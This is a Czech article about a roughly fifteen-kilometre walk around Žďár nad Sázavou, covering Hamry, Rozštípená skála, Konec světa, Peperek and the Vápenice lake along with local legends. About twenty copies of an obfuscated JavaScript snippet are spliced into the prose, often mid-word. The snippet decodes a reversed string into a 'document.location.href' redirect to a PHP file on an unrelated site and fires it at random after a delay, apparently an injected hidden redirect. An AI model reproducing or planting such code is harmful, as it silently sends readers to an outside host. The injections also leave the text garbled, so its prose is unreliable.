Rainbow page separator

Ze Žďáru až na Konec světa a zase zpět

Středa, 26. června 2013

Žďár nad Sázavou / Vycházka v těsné blízkosti Žďáru nad Sázavou není náročná, čítá zhruba patnáct kilometrů. Začíná na žďárském náměstí, kde se pustíme po červené turistické značce ve směru k Hamrům nad Sázavou.

Hamry jsou od Žďáru vzdáleny kilometr, mají asi patnáct s[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tovek obyvatel. Kdysi samostatné vesnice Dolní Hamry, Horní Hamry, Najdek a Šlakhamry se postupem času spojily v jeden celek. Nejstarší část obce Najdek vznikla ve 14. s[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toletí, kdy v okolí končila těžba stříbra, a začínalo se s těžbou železné rudy, jejíž rozsáhlá ložiska byla v lokalitě odkryta. V té době v místě vznikaly první železárny – hamry, kamenická palice přeložená hamernickým želízkem se dostaly i do znaku obce. Kamenictví se v obci rovněž značně rozvinulo, tamní kameníci v okolí vytvořili četné kříže a muka. Kámen z lomu Štěnice byl mimo jiné použit například na stavbu železnice Žďár – Křižanov – Tišnov.

hamron1Obec ve snaze přiblížit návštěvníkům okolní zajímavosti nechala zbudovat patnáctikilometrový Hamerský vycházkový okruh, jehož části kopírují i turistické značky. Hned na začátku Hamrů mineme Hamroně, be[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tonovou abstraktní sochu žďárského výtvarníka Michala Olšiaka. Hamroň byl podle místní legendy podivný tvor, který se nejčastěji objevoval právě v okolí Hamrů. Nikomu neškodil a lidé mu nosili jídlo a dárky.

Červená značka nás nejdříve provede mimo vesnici, stáčí se pod železniční tratí k Jedlovskému rybníku a odtud pak kolem okraje rybníka Dívka. Značení dál míří k železniční zastávce v Hamrech, poté půjdeme kilometr tamní zástavbou až k turistickému rozcestníku Pod Štěnicí. Ten je od náměstí ve Žďáře nad Sázavou vzdálen pět kilometrů. Pokračujeme stále po červené značce, až dojdeme k další Olšiakově soše, kterou je asi 2,5 metrů vysoká hlava Mamuta spočívající pod Rozštípenou skálou.

Atraktivní skalní masiv Rozštípená skála v nadmořské výšce 560 metrů mají v oblibě zejména horolezci. Jedná se o přírodní památku ve správě Chráněné krajinné oblasti Žďárské vrchy. Rulová skála je ve spodní části rozštípnuta zvětralou puklinou o délce deset metrů a šířce asi dva metry. Podle [„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toho[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to rozštípnutí dostala také svůj název.

rozstipena-skala1Geomorfologický útvar vznikl zřejmě vlivem eroze. Jiné teorie ovšem hovoří i o následku silného zemětřesení (8. stupeň Richterovy stupnice), které na začátku srpna roku 1328 zasáhlo Českomoravskou vysočinu. V jeho důsledku byla tehdy rovněž kompletně zavalena důlní díla na Jihlavsku, Tišnovsku i v okolí Žďáru. Výjimkou nebyly ani stříbrné doly na nedalekém Peperku.

Ve spoji[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tosti se vznikem Rozštípené skály však nechybí ani víceméně klasická pověst o čer[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tovi, který prohrál sázku, načež vztekle mrštil o zem obrovským skaliskem, které se při[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tom rozštíplo a zůstalo tam tak už navždy.

Červená značka nás od Rozštípené skály vede dál a po kilometru dojdeme na Konec světa, symbolickou moravsko-českou hranici, kterou v prosklené budce opatřené hamerským znakem střeží figurína his[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}torického celníka vyzbrojeného holí. Mnohem později procházela těmi[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to místy hranice dietrichštejnského panství a po ní zůstal na okraji lesíka hraniční kámen se dvěma dietrichštejnskými noži.

Po červeném značení dále pokračujeme až k rozcestníku Samotín, který je vzdálen půl kilometru. Tam přejdeme na žlu[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tou značku a pustíme se po ní k půl kilometru vzdálenému kopci Peperek, na jehož vrchol vede odbočka. Vrch, ve kterém se kdysi těžila stříbrná ruda, zaujímá stejnojmenná přírodní památka vyhlášená v roce 1974 na rozloze 4,14 hektaru pro ochranu skalnatého hřebene vytvářejícího skalní stěnu dlouhou přes tři sta metrů s balvanovými proudy a sutěmi. Okolí vrcholu Peperku je však zarostlé stromy a neposkytuje žádné rozhledy do okolí. Na vrcholovém skalisku je dodnes vyrytý obrys žehličky, nůžek a klubka nití. Údajně je měl na místě zanechat krejčí, jenž se tam ukrýval koncem třicetileté války.

konec-sveta1Od rozcestníku pod Peperkem pokračuje cesta dále po žlutém značení převážně lesy k přibližně 3,5 kilometru vzdálenému jezírku Vápenice. Kdysi se tam skutečně pálilo vápno, ale jezírko je obvykle nejčastěji spojované s pověstí o nešťastné lásce mladých milenců.

Pán z nedalekého zámku měl krásnou dceru Bohunku, a ta se zamilovala do pohledného myslivce Petra, který byl ve službách jejího otce. To se ale zámeckému pánu nelíbilo, kromě [„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toho si už pro svoji dceru vyhlédl zámožného nápadníka z ciziny. Ten byl nejenom bohatý, ale i zlý, lakomý a navrch ještě ošklivý, takže se nebylo čemu divit, že dívka o něj nestála. Petr Bohunku přemlouval, aby spolu uprchli, ale dívka se bála otcovy pomsty. Odhodlala se až [„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toho dne, kdy měl na zámek dorazit její bohatý nápadník na zásnuby. Dívka podle legendy čekala na Petra u okraje malé jeskyňky nad lomem, a pro[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tože myslivec dlouho nepřicházel, začala plakat. Její slzy stékaly do lomu, a pro[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tože plakala dlouho a usedavě, celý se jimi zaplnil. Vlny Bohunku uchopily a v tu chvíli se objevil Petr, který když uviděl, co se stalo, pro svoji milou skočil. Jakmile ji ale sevřel v náručí, voda je oba stáhla ke dnu, kde spolu odpočívají dodnes…

Ve skutečnosti jezírko Vápenice vzniklo za[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}topením starého vápencového lomu spodní vodou poté, co v něm začátkem 20. s[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toletí skončila těžba. V těsné blízkosti lomu stály kdysi dvě pece, v nichž se vápenec vypaloval na vápno.

jezirko-vapenice2

Jezero je podle průzkumu potápěčů hluboké třináct metrů, jeho dno je pokryté bahnem. Pro[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tože je jezírko Vápenice zastíněno stromy, voda v něm je celoročně studená a žije v ní menší množství různých organismů.

Od Vápenice se vydáme dál k rozcestníku Pod Adamovým kopcem, ke kterému je [„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to kilometr cesty. Odtud nás pak čeká ještě 2,5 kilometru chůze ke žďárskému zámku. Do centra Žďáru se můžeme vrátit buď podél silnice I/37, anebo se poblíž zámku napojit na červenou turistickou značku, která vede do města po cyklostezce kolem Bránského rybníka.